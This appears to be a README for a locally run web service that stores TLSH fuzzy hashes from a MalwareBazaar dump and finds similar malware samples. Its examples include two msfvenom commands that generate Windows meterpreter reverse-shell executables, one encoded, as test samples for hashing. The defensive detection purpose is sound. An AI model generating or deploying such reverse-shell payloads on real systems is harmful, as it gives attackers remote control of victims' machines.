A locally-run fuzzy-matching web service built on TLSH (Trend Micro Locality Sensitive Hash). It loads TLSH digests from a MalwareBazaar CSV dump and answers similarity queries over them.
tlsh-service/
├── app/
│ ├── models.py # Item, Result dataclasses
│ ├── csv_loader.py # parse the MalwareBazaar CSV
│ ├── db.py # SQLite store (seed-if-empty persistence)
│ └── main.py # FastAPI app + endpoints
├── data/
│ └── full.csv # the MalwareBazaar full dump — download it yourself (~400 MB, not bundled)
├── Dockerfile
├── requirements.txt
└── tlsh_tool.py # CLI to hash files / compare TLSH digests (see Examples)
cd tlsh-service
python3 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt
uvicorn app.main:app --reload # http://127.0.0.1:8000Interactive API docs (Swagger UI): http://127.0.0.1:8000/docs
On first start the DB is seeded from the CSV. Data added via POST /tlsh is persisted
in data/tlsh.db and survives restarts — the CSV only re-seeds when the DB is empty.
Reset: seeding only runs when the DB is empty, so delete it to force a fresh re-seed:
rm -f data/tlsh.db. This is also required after a schema change (e.g. the addedsha1column).
| Variable | Default | Purpose |
|---|---|---|
TLSH_CSV_PATH |
tlsh-service/data/full.csv |
CSV to seed from |
TLSH_DB_PATH |
tlsh-service/data/tlsh.db |
SQLite database file |
The service seeds from data/full.csv by default. Download the MalwareBazaar full dump
yourself and drop it there — it's ~400 MB, so it isn't bundled.
TLSH_CSV_PATH=somethingelse/full.csv uvicorn app.main:app| Method | Path | Query / Body | Description |
|---|---|---|---|
| GET | /distance |
?q=<TLSH digest> |
Items within distance 150 of the query digest. |
| GET | /search |
?q=<substring> |
Stored hashes containing the substring. |
| GET | /tlsh |
– | All stored items (avoid on big dataset). |
| POST | /tlsh |
{"name","hash","signature","sha1"?} |
Add an item; persisted immediately. 409 if the hash already exists. |
Note:
/distanceexpects a TLSH digest (e.g.T1AB...), not raw file bytes.
Requests are validated before they reach the database (the DB layer itself uses
parameterized queries, so it's injection-safe regardless). Invalid input gets a 422:
| Field / param | Rule |
|---|---|
/distance q, POST hash |
Must be a TLSH digest: ^(T1)?[0-9A-Fa-f]{70}$ (optional T1 prefix + 70 hex chars) |
POST name |
Trimmed; 1–255 characters |
POST signature |
Trimmed; ≤255 characters (defaults to n/a) |
POST sha1 |
40 hex characters, or n/a (optional; defaults to n/a) |
/search q |
1–128 characters (substring match; no format requirement) |
CSV seeding does not pass through this validation — it loads whatever is in the dump.
For testing, create two payloads with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.122 LPORT=9999 -f exe -o x86default_rshell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.122 LPORT=9999 -e x86/shikata_ga_nai -i 5 -f exe -o x86shikata_rshell.exeCreate the TLSH digests with tlsh_tool.py (run from the tlsh-service/ project root):
python3 tlsh_tool.py --hash x86default_rshell.exe
# T1E6E100B3A2235CF7F3385BBD8283979561FD773406A20B5D0919140A50A2D1979B9F83 x86default_rshell.exe
sha1sum x86default_rshell.exe
# 6a929d62eb6c96c35914071367d515c098b83327 x86default_rshell.exe
python3 tlsh_tool.py --hash x86shikata_rshell.exe
# T140F13257B3360CA3F32C1BBB4287D9F5E0FDB72906E2670E0E2920185092D0930A5F92 x86shikata_rshell.exe
sha1sum x86shikata_rshell.exe
# dce3696a0b38c5c45e4853d515a736350b5368ea x86shikata_rshell.exe# add the default payload (sha1 optional; 40 hex chars if given)
curl -s -X POST http://127.0.0.1:8000/tlsh \
-H 'Content-Type: application/json' \
-d '{"name":"x86default_rshell.exe","hash":"T1E6E100B3A2235CF7F3385BBD8283979561FD773406A20B5D0919140A50A2D1979B9F83","signature":"msfvenom","sha1":"6a929d62eb6c96c35914071367d515c098b83327"}'
# {"status":"created"} (HTTP 201)
# POSTing the same hash again is rejected
curl -s -o /dev/null -w '%{http_code}\n' -X POST http://127.0.0.1:8000/tlsh \
-H 'Content-Type: application/json' \
-d '{"name":"dupe.exe","hash":"T1E6E100B3A2235CF7F3385BBD8283979561FD773406A20B5D0919140A50A2D1979B9F83","signature":"msfvenom"}'
# 409# similarity lookup with the shikata variant -- it finds the default payload we stored
curl -s "http://127.0.0.1:8000/distance?q=T140F13257B3360CA3F32C1BBB4287D9F5E0FDB72906E2670E0E2920185092D0930A5F92"
# one match under the 150 threshold, e.g.:
# [{"distance":118,"signature":"msfvenom","sha1":"6a929d62eb6c96c35914071367d515c098b83327"}]# substring search over stored hashes
curl -s "http://127.0.0.1:8000/search?q=T1E"The Dockerfile is a standard multi-stage build — the commands below should work the same
with podman or docker.
cd tlsh-service
podman build -t tlsh-service .
# run; mount a named volume so the SQLite DB persists across container restarts
podman run --rm -p 8000:8000 -v tlsh_data:/data tlsh-servicePoint the container at the full dataset without rebuilding by mounting the CSV and overriding the env var:
podman run --rm -p 8000:8000 \
-v tlsh_data:/data \
-v /host/path/full.csv:/srv/data/full.csv:ro,Z \
-e TLSH_CSV_PATH=/srv/data/full.csv \
tlsh-serviceOn SELinux systems (e.g. Fedora), add
:Zto bind mounts as shown so the container can read them.
Re-init complete db:
podman volume rm tlsh_data # delete the volume (and the tlsh.db in it)